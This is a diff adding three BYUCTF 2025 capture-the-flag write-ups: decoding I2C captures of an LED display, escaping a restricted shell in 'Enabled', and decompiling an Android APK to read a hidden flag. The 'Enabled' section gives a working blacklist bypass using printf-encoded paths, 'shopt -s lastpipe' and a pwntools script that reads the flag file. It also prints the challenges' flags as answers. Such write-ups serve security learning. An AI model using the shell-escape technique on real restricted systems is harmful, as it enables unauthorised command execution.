byuctf

Author: octo-kumo

2025-byuctf/index.md

@@ -0,0 +1,13 @@
+---
+created: 2025-05-17T05:40
+points: 11465
+rank: 2
+team: wwf
+title: BYUCTF 2025
+updated: 2025-05-17T21:53
+---
+
+Fun little CTF.
+
+::ctf-overview
+::

2025-byuctf/misc/Alpha/index.md

@@ -0,0 +1,114 @@
+---
+ai_date: 2025-05-17 21:38:34
+ai_summary: CSV parsing reveals hidden characters in LED Backpack code, hinting at ASCII art XOR cipher
+ai_tags:
+  - xor
+  - ascii-art
+  - ciphertext
+created: 2025-05-17T05:47
+points: 477
+solves: 58
+title: Alpha
+updated: 2025-05-17T21:52
+---
+
+First we export the data to CSV via Logic 2.
+
+![image.png](https://res.cloudinary.com/kumonochisanaka/image/upload/v1747475861/2025/05/8cf348e909be33fb93f0e5aada82299c.png)
+
+Then we parse it.
+
+```python
+import csv
+
+
+def load_charset(cpp_path):
+    cmap = {}
+    with open(cpp_path, encoding='utf-8', errors='ignore') as f:
+        in_table = False
+        ascii_idx = 0
+        for line in f:
+            if not in_table:
+                if 'static const PROGMEM uint16_t alphafonttable' in line:
+                    in_table = True
+                continue
+            if '};' in line:
+                break
+            parts = line.split('//')
+            code = parts[0].strip().rstrip(',')
+            if not code:
+                continue
+            if ',' in code:
+                continue
+            mask = int(code, 0)
+            ch = None
+            if len(parts) > 1 and parts[1].strip():
+                ch = parts[1].strip()[0]
+            else:
+                if ascii_idx == 32:
+                    ch = ' '
+            if ch:
+                cmap[mask] = ch
+            ascii_idx += 1
+    return cmap
+
+
+def parse_i2c(csv_path):
+    recs = []
+    buf = b''
+    with open(csv_path, newline='') as f:
+        reader = csv.DictReader(f)
+        for row in reader:
+            if row['name'] != 'I2C':
+                continue
+            if row['data']:
+                buf += bytes([int(row['data'], 16)])
+            if row['type'] == 'stop':
+                if buf:
+                    recs.append(buf)
+                buf = b''
+    return recs
+
+
+if __name__ == '__main__':
+    import sys
+    csv_path, cpp_path = sys.argv[1], sys.argv[2]
+
+    cmap = load_charset(cpp_path)
+    cmap[0] = ''
+    records = parse_i2c(csv_path)
+    lines = [[] for _ in range(4)]
+    for r in records:
+        print(r.hex(), len(r))
+        if len(r) >= 16:
+            for i in range(4):
+                mask = int.from_bytes(r[1+i * 2:1+i * 2 + 2], 'little')
+                if mask in cmap:
+                    lines[i].append(cmap[mask])
+                else:
+                    print(f'Unknown mask: {mask:016b} {mask:04x}')
+                    lines[i].append('?')
+    for i in range(4):
+        print(''.join(lines[i]))
+```
+
+Get char map from [Adafruit_LEDBackpack.cpp](https://github.com/adafruit/Adafruit_LED_Backpack/blob/master/Adafruit_LEDBackpack.cpp).
+
+```bash
+python solve.py byuctf.csv Adafruit_LEDBackpack.cpp
+```
+
+For some reason, the best I could get was this, I had to guess the last character.
+
+```
+byuctf{4r3n7_h4rdw4r3_pr070c0l5_c0?byuct
+yuctf{4r3n7_h4rdw4r3_pr070c0l5_c0??yuctf
+uctf{4r3n7_h4rdw4r3_pr070c0l5_c00??uctf{
+ctf{4r3n7_h4rdw4r3_pr070c0l5_c00l??ctf{4
+```
+
+And it wasn't that bad.
+
+```flag
+byuctf{4r3n7_h4rdw4r3_pr070c0l5_c00l?}
+```

2025-byuctf/misc/enabled/index.md

@@ -0,0 +1,42 @@
+---
+ai_date: 2025-05-17 21:38:39
+ai_summary: Bypassed blacklist using printf and read to set PATH, then exploited with shopt -s lastpipe and cat flag
+ai_tags:
+  - shell
+  - cmd-injection
+  - path-traversal
+created: 2025-05-17T04:45
+points: 436
+solves: 96
+title: Enabled
+updated: 2025-05-17T21:52
+---
+
+Well we can use `printf` to bypass the blacklist.
+
+Let's then try refilling the PATH variable with `read`.
+
+```bash
+printf '\\x2fbin:\\x2fusr\\x2fbin'|read PATH
+set
+```
+
+Well it didn't work, `PATH` is empty.
+
+I looked online and apparently there is this command `shopt -s lastpipe` that allows the last command in a pipeline to run in the current shell.
+
+So it would actually set the `PATH` variable.
+
+```python
+from pwn import *
+r = remote("enabled.chal.cyberjousting.com", 1352)
+r.sendline(b"shopt -s lastpipe")
+r.sendline(b"printf '\\\\x2fbin:\\\\x2fusr\\\\x2fbin'|read PATH")
+r.sendline(b"bash")
+r.sendline(b"cat /flag/flag.txt")
+print(r.recvall(timeout=1).decode())
+```
+
+```flag
+byuctf{enable_can_do_some_funky_stuff_huh?_488h33d}
+```

2025-byuctf/misc/index.md

@@ -0,0 +1,64 @@
+---
+ai_date: 2025-05-17 21:38:44
+ai_summary: Flag found in XML element positions after decompiling APK
+ai_tags:
+  - xml
+  - decomp
+  - android
+created: 2025-05-17T06:52
+points: 241
+solves: 191
+title: Baby Android 1
+updated: 2025-05-17T21:52
+---
+
+First decompile the APK using `apktool`.
+
+```bash
+apktool d baby-android-1.apk
+```
+
+![image.png](https://res.cloudinary.com/kumonochisanaka/image/upload/v1747479406/2025/05/17289875b583f6f2befe70589396cd2d.png)
+
+And it is right there.
+
+![image.png](https://res.cloudinary.com/kumonochisanaka/image/upload/v1747480022/2025/05/7ac73347a1c2678ea4accde6266e894b.png)
+
+```python
+import matplotlib.pyplot as plt
+import xml.etree.ElementTree as ET
+tree = ET.parse('flag.xml')
+root = tree.getroot()
+
+chars = []
+for elem in root.iter():
+    mB = elem.get('{http://schemas.android.com/apk/res/android}layout_marginBottom')
+    mE = elem.get('{http://schemas.android.com/apk/res/android}layout_marginEnd')
+    if mB is None or mE is None:
+        continue
+    mB = float(mB.replace('dip', ''))
+    mE = float(mE.replace('dip', ''))
+    chars.append((elem.get("{http://schemas.android.com/apk/res/android}text"), mB, mE))
+
+
+sortedByB = sorted(chars, key=lambda x: x[1], reverse=True)
+sortedByE = sorted(chars, key=lambda x: x[2], reverse=True)
+print("".join([x[0] for x in sortedByB]))
+print("".join([x[0] for x in sortedByE]))
+
+
+plt.figure(figsize=(10, 10))
+for char, mB, mE in chars:
+    plt.text(mE, mB, char)
+plt.grid(True)
+plt.xlabel('MarginEnd')
+plt.ylabel('MarginBottom')
+plt.title('Character Positions')
+plt.xlim(0, 1000)
+plt.ylim(0, 1000)
+plt.show()
+```
+
+```flag
+byuctf{android_piece_0f_c4ke}
+```